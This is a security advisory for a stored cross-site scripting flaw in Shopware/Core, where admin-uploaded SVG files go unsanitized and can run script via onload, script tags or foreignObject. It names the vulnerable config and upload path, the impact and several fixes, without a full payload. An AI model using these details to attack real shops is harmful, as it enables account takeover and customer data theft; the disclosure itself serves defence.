PT-2026-46874 — Shopware/Core+1

PT-2026-46874 · Packagist · Shopware/Core+1

Published

2026-06-04

Updated

2026-06-04

CVSS v3.1

4.9

Medium

Vector

AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

SVG files are in the allowed extensions whitelist and can be uploaded by any admin user via the media manager. There is zero SVG content sanitization anywhere in the upload pipeline. A malicious SVG with JavaScript (onload, <script>, <foreignObject>) executes in the context of the Shopware domain when accessed.

The Problem

In src/Core/Framework/Resources/config/packages/shopware.yaml, line 194:

allowed extensions: ["jpg", "jpeg", "png", "webp", "avif", "gif", "svg", ...]

SVG is whitelisted. The upload path (MediaUploadController → FileSaver → TypeDetector) recognizes SVG as ImageType with VECTOR GRAPHIC flag, but no code strips JavaScript, event handlers, or external entity references from the SVG XML.

A search of the entire codebase for SVG sanitization returns — no DOMPurify, no svg-sanitize, no strip tags on SVG content, nothing.

Impact

Stored XSS affecting all users who view the uploaded SVG. In an e-commerce context, this can lead to admin account takeover, customer data theft, or malicious plugin installation.

Suggested Fix

Either:

Remove SVG from allowed extensions if SVG upload is not a core requirement
Sanitize SVG content on upload using a library like enshrined/svg-sanitize (strips scripts, event handlers, external references)
Serve SVGs with Content-Disposition: attachment to prevent inline rendering
Serve SVGs from a separate domain (like Nextcloud's usercontent.apps.nextcloud.com)

Option 2 is the most practical — enshrined/svg-sanitize is already used by WordPress and other PHP projects.

Regards & BG, Keyvan Hardani

Fix

XSS

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-79

Related Identifiers

GHSA-XVHC-GM7J-MHMC

Affected Products

Shopware/Core